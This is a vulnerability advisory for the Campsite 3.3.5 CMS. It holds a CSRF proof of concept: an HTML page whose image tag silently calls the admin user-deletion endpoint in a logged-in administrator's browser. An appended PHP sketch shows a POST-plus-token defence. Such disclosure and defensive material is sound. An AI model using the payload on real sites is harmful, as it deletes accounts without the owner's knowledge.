
# Title : Campsite v3.3.5 CSRF Vulnerability
# Published : 2010-03-10
# Author : Pratul Agrawal


=======================================================================
   
                                         campsite 3.3.5 CSRF Vulnerability
 
                     =======================================================================
   
                                                     by
   
                                                Pratul Agrawal
 
   
   
  # Vulnerability found in: Admin module
   
  # email         Pratulag@yahoo.com
   
  # company       aksitservices
   
  # Credit by     Pratul Agrawal

  # Category  	  CMS / Portals
  
  # Site page     http://wwwcampware.org/
  
  # Platform      PHP
  
   
   
  #  Proof of concept   #
 
  Targeted URL:  http://server/admin/login.php
  
 
  Script to delete the Admin user through Cross-Site Request Forgery.
  The delete action is a plain GET request, so the page below only has to be
  loaded in the browser of an administrator who is logged in:
  
  ......................................................................

                        <html>
                          <body>
                           <img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff />
                          </body>
                        </html>

  ......................................................................
  
  
  
  After execution, refresh the page and you can see that the user with the given ID has been deleted automatically.
 
 
# If you have any questions, comments, or concerns, feel free to contact me.
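
  # Mitigation sketch (added example) #

  The check that a delete handler such as do_del.php is missing, written as an added example; it is not Campsite code and not part of the original advisory. The function names, the csrf_token field and the sample requests are assumptions made for illustration. It refuses the GET issued by the <img> tag above and any POST that lacks the per-session token.

```php
<?php
// Added example: hypothetical guard for a state-changing admin action.
// Not Campsite code; all names below are assumptions.

// Issue one random token per session; the admin form embeds it as a hidden field.
function csrf_issue_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a delete request may proceed. Returns [allowed, reason].
function may_delete_user(string $method, array $post, array $session): array {
    // 1. State changes only via POST: image, script and link loads are GETs.
    if ($method !== 'POST') {
        return [false, 'method not allowed'];
    }
    // 2. The token must be in the request body and match the session copy.
    $sent = $post['csrf_token'] ?? '';
    $want = $session['csrf_token'] ?? '';
    if (!is_string($sent) || $want === '' || !hash_equals($want, $sent)) {
        return [false, 'bad or missing CSRF token'];
    }
    // 3. Validate the target id before acting on it.
    $id = $post['User'] ?? '';
    if (!is_string($id) || !ctype_digit($id)) {
        return [false, 'invalid user id'];
    }
    return [true, 'ok'];
}

// Constructed requests for demonstration (not captured traffic).
$session = [];
$token = csrf_issue_token($session);
$cases = [
    'cross-site <img> GET'  => ['GET',  []],
    'cross-site POST'       => ['POST', ['User' => '7', 'uType' => 'Staff']],
    'admin form POST'       => ['POST', ['User' => '7', 'uType' => 'Staff', 'csrf_token' => $token]],
];
foreach ($cases as $name => [$method, $post]) {
    [$ok, $why] = may_delete_user($method, $post, $session);
    printf("%-22s => %s (%s)\n", $name, $ok ? 'ALLOW' : 'DENY', $why);
}
```

  Run with the PHP CLI (7.1 or later); only the last case is allowed. Setting the session cookie with SameSite=Lax or Strict adds a second layer on top of the token check.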